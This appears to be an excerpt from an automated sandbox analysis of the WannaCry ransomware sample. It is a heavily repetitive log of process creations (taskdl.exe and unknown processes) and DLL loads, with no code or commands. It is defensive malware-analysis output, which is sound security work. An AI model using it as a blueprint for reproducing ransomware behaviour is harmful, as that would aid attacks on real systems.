Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: unknown unknown

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mfsrcsnk.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
